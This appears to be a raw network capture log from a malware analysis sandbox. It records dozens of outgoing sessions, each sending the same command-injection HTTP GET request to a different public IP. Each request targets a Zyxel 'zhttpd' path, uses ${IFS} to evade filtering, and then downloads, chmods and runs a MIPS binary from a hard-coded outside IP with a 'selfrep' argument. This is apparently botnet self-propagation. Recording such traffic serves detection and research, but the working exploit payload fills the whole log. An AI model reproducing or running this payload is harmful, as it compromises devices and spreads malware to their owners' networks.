                                          Jan 14, 2024 15:46:19.057847977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5020192.168.2.234661419.95.212.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.057895899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5021192.168.2.233358069.229.14.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.057919025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5022192.168.2.2337394199.5.236.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.057975054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5023192.168.2.233801664.5.161.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.058023930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5024192.168.2.2347248176.240.11.94443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.058043957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5025192.168.2.234989050.17.105.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.058130026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5026192.168.2.234629642.27.239.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.058142900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5027192.168.2.235251832.207.117.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.058216095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5028192.168.2.235213468.126.107.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.058255911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5029192.168.2.2346372179.201.190.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.058286905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5030192.168.2.2342732182.211.208.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.058341980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5031192.168.2.2333816147.232.134.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.058362961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5032192.168.2.234748885.65.8.235443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.058401108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5033192.168.2.2337488103.211.13.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.058428049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5034192.168.2.2358710114.54.112.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.058487892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5035192.168.2.233811665.231.104.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.058542013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5036192.168.2.2359312212.191.56.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.058573961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5037192.168.2.2356718137.234.160.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.058600903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5038192.168.2.2348688121.243.195.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.058625937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5039192.168.2.234708265.63.47.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.058660984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5040192.168.2.2354556150.92.84.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.058736086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5041192.168.2.2338982109.3.67.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.058768988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5042192.168.2.235365270.249.86.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.058836937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5043192.168.2.2350712137.22.59.250443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.058857918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5044192.168.2.234994434.187.104.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.058877945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5045192.168.2.234770094.198.84.209443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.058959961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5046192.168.2.2351224190.159.1.127443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.058980942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5047192.168.2.2359128148.153.90.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.059031963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5048192.168.2.2350716191.27.204.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.059050083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5049192.168.2.2341734153.153.187.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.059112072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5050192.168.2.234317269.23.99.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.059127092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5051192.168.2.234959023.227.122.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.059195995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5052192.168.2.2337546210.10.177.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.059220076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5053192.168.2.2350798141.193.17.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.059269905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5054192.168.2.2333412139.158.186.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.059304953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5055192.168.2.2359942137.221.157.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.059330940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5056192.168.2.234799243.57.255.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.059367895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5057192.168.2.2337666188.183.186.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.059417963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5058192.168.2.234600678.115.98.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.059452057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5059192.168.2.2344920191.3.254.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.059531927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5060192.168.2.234753676.90.95.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.059556961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5061192.168.2.2347384217.148.124.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.059609890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5062192.168.2.2360356184.81.76.243443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.059628963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5063192.168.2.235140668.47.60.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.059693098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5064192.168.2.2353636123.224.119.34443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.059729099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5065192.168.2.2352812108.195.58.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.059781075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5066192.168.2.2355314201.236.69.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.059809923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5067192.168.2.233821872.181.52.203443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.059859037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5068192.168.2.234181083.142.136.51443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.059900999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5069192.168.2.2356464199.120.250.9443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.059935093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5070192.168.2.2347534110.123.85.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.059995890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5071192.168.2.234355036.232.194.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.060033083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5072192.168.2.234502820.141.53.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.060055017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5073192.168.2.2356200182.207.153.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.060120106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5074192.168.2.235966279.57.75.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.060142040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5075192.168.2.235552249.241.254.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.060178041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5076192.168.2.2353096110.171.5.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.060220957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5077192.168.2.2360484139.169.135.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.060255051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5078192.168.2.234002271.202.208.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.060290098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5079192.168.2.2351408139.42.48.127443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.060340881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5080192.168.2.2359716149.227.200.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.060340881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5081192.168.2.2357362174.95.18.226443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:19.060374975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          5082192.168.2.2346490112.42.126.249443
                                          TimestampBytes transferredDirectionData
